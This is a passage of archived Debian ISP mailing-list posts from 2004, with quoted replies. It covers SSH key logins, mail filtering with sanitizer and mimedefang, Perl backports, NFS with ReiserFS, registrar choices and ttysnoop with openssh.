sequence) > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact > > [EMAIL PROTECTED] > > > > > > > > -- > Michael Loftis > Modwest Sr. Systems Administrator > Powerful, Affordable Web Hosting > > >
Re: SSH Privat key and login as root without a passwort
> iam looking for generate a privat SSH-Key. There is a toolthe generates > Privat RSA keys. Now i have a privat key generated but where must i put > it in the Linux that linux know who ami and i didnt need a passwort for > login. You put the **private** key on the system you are connecting FROM, (in your case this looks like Putty) and you put the **public** key on the system you are connectiong TO. (in your case this looks like in ~/.ssh/authorized_keys) The docs for putty, ssh, ssh-keygen should be helpful: http://www.tartarus.org/~simon/puttydoc/Contents.html man ssh-keygen man sshd # see end for authorized_keys file info It is worth noting that putty can import/export openssh keys. Also you should check that the system administrator has not disallowed use of public/private keys for ssh authentication. (see /etc/ssh/sshd_config on the system you are connecting TO) On Sun, 18 Jan 2004, Fraser Campbell wrote: > On January 18, 2004 10:45 am, ournewsletter wrote: > > > put it in /root/.ssh/authorized_keys. I don't know if it works with the key > > produced by Putty, but with a "ssh-keygen"-generated public key it does. If > > you need more public keys to log in, simply name the key > > files /root/.ssh/authorized_keys2, /root/.ssh/authorized_keys3 ... > > Putty keys do works with openssh but you must edit them first. Putty keys > look rather like the ascii export of a gpg key, you must edit them so that > they look like this: > > ssh-rsa 89yh23wrnhjfdg... #all one line > >
Re: apt-get and mounting /tmp with noexec option
How about running apache chroot'd so what apache thinks is /tmp and what apt-get thinks is /tmp are two different things? fstab would look something like: (untested) # /dev/sdc1 /var/www/tmp/ noexec, blah,blah,blah
shell access exploits (was Re: upgrading to MySQL 4 on woody)
> I have at most a week from a known kernel exploit to when one of my users > tries to exploit via shell access. One of my hats is a junior sys admin in an academic environment. I'm curious as to how you know when shell users are trying to exploit a kernel hole. In another non academic environment and based on info from this list, I've been running snoopy with an eye to grepping the logs for naughiness # On Mon, 19 Jan 2004, Lucas Albers wrote: > > Rod Rodolico said: > > > Becoming a firm believer that you CAN have it all, stability and the > > latest packages :) > > > > There are other places to get backports, BTW. This one works for me. > > > Rod, > Yes I agree with your statements. > Thanks for the link I'll use it on one of my systems... > > But you don't explicitly have security, you have the testing delay for > security updates, combined with the propagation time to backports from > testing. > > I'm still leery of using testing for any publicly exposed service, or for > machines with shell access. > I have at most a week from a known kernel exploit to when one of my users > tries to exploit via shell access. > > --Luke CS Sysadmin, Montana State University-Bozeman > > >
changing max privledged port from 1024
How do you allow non root users to bind to ports below 1024 ? Alternatively, what iptables / tcpwrappers / xinetd / stunnel / magic thing should I be looking at to forward port 995 to port 5432 ? Our bandwidth provider (A university telcom dept) is filtering port 5432, the postgres port. On the political front things are proceeding slowly. We'd like to bind postgress to port 995 (etc/sertices says: pop3 over SSL) as this port is unlikely to be closed and we're not running pop3 over SSL on the database machine. Postgresql does not run as root and hence cannot bind to port 995 A morning of google and man sysctl have given teases but no answers.
Re: Still Considering Debian - But Stuck!
I don't have a footnote, but I believe a recent linux journal article says that the 2.6 kernel uses a posix threads library which are much nicer than linux threads and that redhat has backported this support to RH9 and the 2.4 kernel. It should be possible to DL the redhat 2.4 patches On Mon, 2 Feb 2004, Dr. G Wu wrote: > RH9 support NTPL, which might explain your problem. > could you also have a look at this post. > http://forums.gentoo.org/viewtopic.php?t=38138 > It is a hot discussion about why Java is slower on Linux than on > Windows, slower on Gentoo than on RH9, whether NTPL would help boost > the performance. > regards, > Ben > > > On Monday 02 February 2004 6:24 pm, Fred Whipple wrote: > > Hi Everyone, > > > > A while back I asked for some feedback and got a very rich set of > > info from folks about Debian used in a stable ISP environment as > > compared to other OS's and distributions. All the info was very > > helpful and helped us further solidify our desire (though not yet > > decision) to make Debian our platform as we move forward. > > > > We've run into a couple rather HUGE issues, though, that I'd like > > to get further feedback on. Not that I couldn't figure it all out > > for myself, but nothing beats someone else's experience when it > > comes to saving me the time and heartache ;-) Just about everyone > > warned me that the stable Debian distribution would be old and well > > tested/maintained, but I'm not sure I was prepared for just HOW > > old... > > > > Our company uses Java --- a LOT of Java. We therefore use a lot of > > threads, and a lot of threads. And a whole mess of threads, too. > > Under Red Hat 7.3, we found that when the system had a total of > > say, 10,000 PID's given out (nearly all of them to threads) the > > system would become very unstable. When we moved to Red Hat 9 for > > the affected systems, which includes the new 0(1) scheduler, and > > either a different kind of thread support in either the kernel or > > GlibC, this problem went away. I'm honestly not sure who is > > responsible for the way threads are handled, and I suspect it's not > > exclusively the kernel, but under RH9 each JVM (or any app with > > threads) gets a single PID as normal and all very strange behavior > > that we saw under RH7.3 disappears. > > > > I see that Debian 3.0r2 includes a nicely aged (like fine cheese) > > Linux 2.2 kernel. While I'm certain the aging process only makes > > its flavour stronger and more delectable, I'm afraid it's going to > > choke at the thought of 10,000 threads. Say nothing of 20,000. > > Now I imagine it's not so difficult to simply compile a recent 2.4 > > (2.5?) kernel and go from there. Is this fair? Or would you > > suppose that the current stable Debian is too old in other areas to > > properly handle kernel 2.4? > > > > Even if I replace the kernel, I'm concerned that there's more > > involved with the more efficient handling of threads from RH 7.3 to > > RH 9 than just a kernel change -- I have to think there was a > > significant rework of some libraries that made threads more > > efficient under RH9 as well. Would anyone be able to identify > > exactly what that re-working was, and conjecture if they think it > > can be done under 3.0r2? For that matter, would I at that point be > > running so much new technology that I may as well be running an > > unstable distribution of Debian? > > > > Finally, while I'm messing around with the kernel, I'd have to > > include support for ext3fs. In our environment, journaling is not > > an option, it's a base requirement. Of course replacing the kernel > > would pretty much give me kernel-level support for it. From that > > point, how complicated is it to get the rest of the tools to play > > nicely with ext3fs? I'd imagine that a large set of tools would > > need to be replaced, including e2fsck, mount, umount, etc. > > > > Thanks once again for all the info so far! > > > > -Fred Whipple > >
configure anomy sanitizer to drop not defang ?
anomy sanitizer works well with postfix, but as far as I can tell, it can't be configured to drop messages instead of defanging them. I plan to configure sanitizer to add a tag to bad messages and then use procmail to quarantine messages with that tag. Is there better way? Is there something that does what sanitizer, works with postfix and allows me to drop messages completely? Mimedefang seems ideal, but it only works with sendmail.
Re: configure anomy sanitizer to drop not defang ?
> What's wrong with sendmail? Well, mostly that I've bought into the postfix fanboy propaganda that postfix is superior for speed, security, ease of use and world peace. ## On Thu, 5 Feb 2004, Lucas Albers wrote: > > Dan MacNeil said: > > > > anomy sanitizer works well with postfix, but as far as I can tell, it > > can't be configured to drop messages instead of defanging them. > > > > I plan to configure sanitizer to add a tag to bad messages and then use > > procmail to quarantine messages with that tag. Is there better way? > > > > Is there something that does what sanitizer, works with postfix and allows > > me to drop messages completely? > > > > Mimedefang seems ideal, but it only works with sendmail. > > What's wrong with sendmail? > I use it with mimedefang, and it works awesome. > I can do spam filtering, greylisting, ptr-helo checking, virus scanning, > extension filtering, mimetype-filtering, zipfile extension blocking,etc. > The correct behavior with mimedefang is to generate a bounce for rejected > spam, and discard for detected virus's. This is all at the 5xx level. > You can also query internal mail servers/ldap servers to determine if an > account exists before accepting mail from that sender or recipient. > So you only accept mail from a sender, if that sender exists on one of > your internal systems. > My external mx is a debian sendmail 8.12.3, mimedefang 2.38 system and it > handles all department mail load fine. >
Re: How do you manage Perl modules?
I'm in similar situation, last night I installed spamassassin & razor from backports.org. It seems to be working ok Fortunately for me, I don't have to worry about being forward compatible with an existing Bayes db. For you a (maybe painful) alternative to going to unstable is to discard your older Bayes and automatic whitelist files. Another alternative is to dump at least your whitelist to text, and then script an import btw, the first time you ran sa-learn did you get an error? something like like: "whatsits_foo.a not in @INC --needed for Digest::SHA1" I tried to make the problem go away with apt-get but got something like: "blah is already the current version" I succeeded in making the problem go away w/ /usr/bin/perl -MCPAN -e install Digest::SHA1 # On Sun, 8 Feb 2004, Craig Sanders wrote: > On Fri, Feb 06, 2004 at 05:41:18PM -0500, Kris Deugau wrote: > > However, I've just discovered that there's also a bad version mismatch > > between the "default" libdb version used by DB_File in RedHat, and the one > > in > > Debian (db3 in RedHat vs db1 [I think] in Debian). I also discovered that > > this has been included as a part of the monolithic perl-5.6.1 package, and I > > *really* don't want to go anywhere near backporting that myself or using a > > third-party backport. > > > > I discovered this in trying to get the SA2.63 install (from backports.org) > > to > > recognize the ~40M global Bayes dbs and per-user AWL files; instead I > > discover pairs of .dir + .pag files for AWL (which I vaguely recall are an > > artifact of db1) and SA won't open the existing bayes_* files. > > sounds like you've run into a reason to upgrade to unstable. > > you have three choices: > > 1. backport perl 5.8.x and libdb4 and all associated modules and other >packages. > > 2. try to find a backports archive where someone else has done the same. > > 3. point sources.list at unstable and either 'apt-get install' perl and >other packages, or 'apt-get dist-upgrade'. > > choice 1 is a lot of work. > > choice 2 doesn't really offer any benefits over just upgrading to 'unstable', > or upgrading certain packages to their 'unstable' versions. > > choice 3 will result in the least problems, and will be better tested - there > are far more people using unstable than there are using backports of perl. > > > Is there something like cpan2rpm or cpanflute for Debian? I'd like to > > pull in current versions of Perl modules > > dh-make-perl can fetch a package from CPAN and produce a working package that > is good enough for local use (but not "polished" enough to upload to debian > for > re-distribution). > > > (or even just recompile the > > stable version against different libs). > > this is always an option. it's called 'back-porting'. download the > debianised > source from unstable (along with any build dependancies) and build it. > > > > I *could* hack together some bits to force db3 to work by building on > > RedHat, and using alien to install... but that's just plain ugly and as > > I've already discovered it *will* break because of differences in how > > RedHat and Debian handle the core Perl install and addon modules. > > really, upgrading to 'unstable' will be the least-hassle option. > > 'unstable' means that the entire system is in flux, that it changes > constantly. it > does not mean that the packages in it are unreliable. > > craig > > ps: i've been running ALL of my production servers on 'unstable' since 1995. > i upgrade them semi-regularly. no major problems. > > >
Community Network $8000 contest
I'm not affiliated with these folks but this $8000 contest may be of interest to folks on this list. Feel free to pass this on to other lists, this is the only list I'm sending it to. # Community Network Open Source Package Awards program http://www.afcn.org/opensource/ [...] A key service of most community networks (CNs) is providing Internet-based services to community, civic, and nonprofit groups. Community networks need an easy to install and easy to manage suite of information services that has an integrated and easy to use Web interface, so that volunteers and staff who are not Unix experts can set up, configure, and support service packages for local civic and community groups. With financial support from its partner, the University of Baltimore School of Information Arts and Technologies, the Association For Community Networking offers two awards of $4000 each for the Open Source-based service packages that most successfully meets all of the specifications outlined below. The two awards are designed to meet the needs of most community networks.
web control panel|vpopmail / Tequila / courier / openLDAP / postfix
We're getting enough domains and email accounts that doing things by hand is getting to be a pain. (even with some scripts) We'd like to give our users a web control panel to handle email account administration for their own domains. We use: Postfix Courier-pop/imap Squirrelmail procmail sanitizer/f-prot spamassassin openLDAP (soon) Tequila seems almost perfect but it is in beta. http://www.holgilein.de/coolprox/tequila/ There are testing packages for vpopmail but it seems to require putting qmail into the mix. http://www.inter7.com/vpopmail/postfix.txt What are your experiences with these or other software libre web control panels?
Re: debian on HP proliant
> The installer from woody has built-in support for the cciss controller > on at least the Proliant DL 580 G2. > It works smoothly, but lacks support for the default installed 3com > gig-ethernet adapter (tg3 driver), once installed, The network installer for sarge detects the t3 gig-ethernet adaptor automagically. --We're moving to Sarge now. On Fri, 16 Apr 2004, Jose Alberto Guzman wrote: > Nathan Eric Norman wrote: > > On Fri, Jan 16, 2004 at 10:33:09AM -0500, Eric Sproul wrote: > > > >>On Fri, 2004-01-16 at 10:15, Francis Tyers wrote: > >> > >>>The onboard 'scsi' controller appears as a block device and not as a > >>>scsi device under linux. > >>> > >>>01:03.0 RAID bus controller: Compaq Computer Corporation Smart Array > >>>5i/532 (rev 01) > >>> > >>>i think it is... > >>> > >>>there is a driver in linux 2.4.x... > >> > >>The driver is called cciss, and supports the built in SmartArray > >>controller as well as the higher-end optional RAID controllers like the > >>641/642. > >> > >>Look in /proc/driver/cciss/ccissX (where X is the controller number, > >>usually '0' for the built-in) for some basic info. > >> > >>Devices attached to these controllers appear as /dev/cciss/cXdXpX > >> > >>c=controller # > >>d=logical drive # > >>p=partition # > >> > >>Thus the first partition on the first logical drive on the built-in > >>controller is /dev/cciss/c0d0p1. > > > > > > Is anyone aware of a debian-installer image which supports cciss built > > in? The existing d-i supports cciss just fine, but as a module. > > > > The installer from woody has built-in support for the cciss controller > on at least the Proliant DL 580 G2. > > It works smoothly, but lacks support for the default installed 3com > gig-ethernet adapter (tg3 driver), once installed, I usually either copy > a recent kernel source and compile whatever I need, or install an > eepro100 (or other supported) card to finish. > > The trick is to install with the bf24 kernel: version 2.4.18. > > Check the help at the Woody CD install boot prompt. > > > José > > > PS. > please reply to the list > > >
RaiserFS via NFS
I've just converted from mbox to maildir Right now there are some users with 500 files in a directory, I expect this go grow. I expect this figure to grow. RaiserFS is looking good. The benefits of running a central storage server and a bunch of seperate web/smtp/pop3/spamfiltering/ftp/ servers, one storage server running not much more than NFS all connected with a cheap Gigbit switch are also appealing to me. Is there any benefit to RaiserFS if I am accessing it via NFS ?
Re: RaiserFS via NFS
On Sat, 17 Apr 2004, Michelle Konzack wrote in part: >But use a self-compiled Linux with nfs and nfsd compiled WITH >"TCP" and "v3" support. >if you mount your server add "nfsvers=3,tcp" to it otherwise it >will use UDP which is realy not good. Why? from my (maybe wrong?) reading of the docs, the advantage of TCP is that it is hard to spoof given that it is connection oriented. I plan to run NFS on a completely internal network and configure iptables to drop packets from outside the network. The NFS server will not be connected to the outside world and the application servers will have 2 NICs one for the internal Gb/sec 10.0.0.* network and one for the outside world. Andrew Miehs writes in part: > I suggest you all read > http://www.porcupine.org/postfix-mirror/newdoc/NFS_README.html > Especially when it comes to mail. With Maildir you will have less > problems than with mbox, but you still do NOT have atomic transactions, > and as such you will at some stage statistically have a problem. Porcupine says in part: [empathizes added] > switch to maildir style, which needs *no* application-level lock > controls). Other people say: >[DONT USE NFS FOR MAIL OR YOUR PRIVATE PARTS WILL > BE EATEN BY GOLD FISH] See: the spec for maildir http://www.qmail.org/man/man5/maildir.html I can't say I've ever seen a convincing argument against maildir's safety... Am I right in that nobody on the list knows whether or not any advantage to running raiserFS is swallowed by NFS?
domain registrar recommendation?
Right now most of our domains are registered with register.com, support is good, they provide DNS but... $35 per domain per year is pretty steep. Eventually we'd like to be our own registrar or to use a domain wholesaler like: http://resellers.tucows.com/ >From other lists OpenSRS/tucows seems pretty good but right now we aren't adding 25 domains a year, which is apparently the break even point. Can anyone recommend a registrar? Criteria in order of importance are: 0) Business integrity (no network solutions please) 1) Almost perfect uptime 2) Ease of administration/support 3) price 4) Ease of transferring domains to us when we become a registrar.
ttysnoop openssh woody
Does anyone have a recipe for getting ttysnoop working with openssh on woody w/o recompiling openssh? This guide: http://64.233.161.104/search?q=cache:ieeFRmtUJ-AJ:www.forty-two.nl/documentation/HOWTOOPENSSHwithTTYSNOOP.pdf+ttysnoop/++ssh+snooptab++login+program&hl=en&lr=lang_en ...will do it but I am too lazy to recompile open ssh. The primary goal is collaberation not spying so I could setup telnet limited to local host & follow the fine man, but this seems an extra step...
